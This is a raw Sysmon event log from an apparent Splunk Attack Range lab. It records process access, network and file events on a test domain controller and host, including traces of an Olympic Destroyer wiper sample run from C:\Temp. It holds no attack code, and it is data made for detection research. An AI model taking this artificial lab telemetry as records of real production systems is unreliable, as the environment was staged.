10:57:51.412{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217926Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:51.412{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-132F-6216-9004-000000003902}3060C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217925Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:51.412{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-132F-6216-9004-000000003902}3060C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217924Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:51.412{4F8D34B0-132F-6216-9004-000000003902}3060C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000217940Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.548{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51424-false10.0.1.12-8000- 23542300x8000000000000000217939Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:52.646{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90457B73F8BA51073B2E996F66C46E4D,SHA256=6A56E576A3BDCB8C8DD5BBDF021473634EDC4F584F1EC6CDDEA70E6FDFAD2BCC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293366Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:50.837{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local137netbios-nsfalse10.0.1.15WIN-HOST-TCONTR137netbios-ns 354300x8000000000000000293365Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:50.835{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local137netbios-nsfalse10.0.1.1ip-10-0-1-1.eu-central-1.compute.internal137netbios-ns 23542300x8000000000000000293364Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:52.223{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C53A26D2C3F27EB8AB154CC87BEDA52,SHA256=C1F26003585835440F9BE41239E17F8D3C04776BBCECCBC8AB54FECF63786736,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217938Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:52.427{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=76090F9FC090C4C30E8E2F8536AC135B,SHA256=5DDBAFCE0BB20411632D4E0F17F87DABD30170BC2BE13CE125850AAD40C52623,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293363Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:49.549{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53791-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000217941Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:53.646{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=716292894789506EA3A50B3813E1B006,SHA256=81655A06830769E8128610253A4F98593D3203815F0A9220A72DBC729FC02635,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293374Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:53.246{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06B68DF60A91C18C51E10357C7DC25EB,SHA256=95C37877A427CA6382B51C3C9E675FD1FF36C05263E7C278E549375ED09595BA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293373Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:53.239{C8EA50B7-F2AD-6215-C000-000000003802}48564804C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293372Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:53.238{C8EA50B7-F2AD-6215-C000-000000003802}48564804C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293371Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:53.238{C8EA50B7-F2AD-6215-C000-000000003802}48564804C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293370Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:53.222{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+639b0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293369Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:53.222{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47d70|C:\Windows\System32\SHELL32.dll+6396c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293368Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:53.222{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63940|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293367Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:53.222{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217942Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:54.661{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99A4CEBB28749C92BDC5B8AB4BFB0FF9,SHA256=CC702F552696480211D2C9CFCBA1B496EABC8C5F2FA1F36F37918DDFD2F4EDBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293375Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:54.281{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1B8A83218D940DE0F87645DED78143E,SHA256=6B945BD9FAE03199899F295074355E5F095CC9DF9783402846EDA55D4D8D4BA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217943Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:55.693{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBD376CB6769AB9067F33553A3DDDE37,SHA256=A7B3164C1BCE709E7A46D21873299E334EA2B149D848CE2C4D6981E6C21B58DC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293379Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:55.915{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000293378Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:55.915{C8EA50B7-1318-6216-4C06-000000003802}7072C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 534500x8000000000000000293377Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:55.907{C8EA50B7-1318-6216-4B06-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000293376Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:55.301{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15615D3F280382382F995748650FCFA3,SHA256=D9BF14D869F1D4E977AE2623CC3F9D17E2FCA9A85BEE93DC2D53B6776F2DDE63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217944Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:56.927{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=754ADF0D51513D2C855A0C50C567525E,SHA256=5CC8A00F50D29C07808B4F7BA2203048A2A94BD3B70B2AC01D1BEE74B7D44FC4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293381Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:54.617{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53794-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000293380Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:56.345{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9843923E33DFB4105C0631DE6242603E,SHA256=67051B416986303A8F4675980AABD8C3131ED462E657763EF16D9A03B667A027,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217946Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:57.989{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C065E981678BC47563596483B4CC65DA,SHA256=CC5C8179136777767D902A097A62805A0ECCCFD78E2453CA7AACAFB3B6EDBF2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293382Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:57.398{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C0C39F166E924503F30A252708D6A40,SHA256=A05DBC1E0ADBC28C42771D2AA45FB5311E9EFBFDFA1817601B9B769F64430262,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217945Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:55.579{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51425-false10.0.1.12-8000- 23542300x8000000000000000293385Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:58.435{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA7CA0E8DC7ED97F5BA2B9FCCE16878A,SHA256=F5D7E7940666658C4E9FDA6CD9E0621FD1A53A01990E4E427874B7461753EA71,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293384Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:58.170{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293383Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:58.169{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217947Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:59.036{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C900B18D2239F6348F83E05EFA51606,SHA256=6EF08A51387782542F698B74B9434F48102BD72BBD6085B87F8A5DA44DA603B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293386Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:59.450{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=021ADE03A48E625865B9E78E7DF1764C,SHA256=914F912B79E38505987B2734FB19E405F8BFA368EC6921AC49914E81CA7E6524,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217948Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:00.255{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E562F73F7DA4602A444C31C3A6D04D60,SHA256=CA50A11C93AF87C23296B36BE7D5F0887701050E4FCE30EE43CBA040A97A5CFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293389Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:00.453{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=879D3E47075D082A0D4F85F55DC1B90E,SHA256=DFE9C3A41E5CC72ECBA9A7792FB6B1CF6A1C479E178817C75F9AADA89DF91471,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293388Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:00.291{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-11CF-6216-2205-000000003802}6168C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293387Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:00.291{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293399Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:01.500{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8350A92CB5E242773E921134FB0B2DA,SHA256=0C78024012A0C0357FFACDD5006552FC9B306F29DE89208FA6B8DBE7C87CFA9A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293398Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:01.446{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1339-6216-6106-000000003802}6860C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217949Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:01.287{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 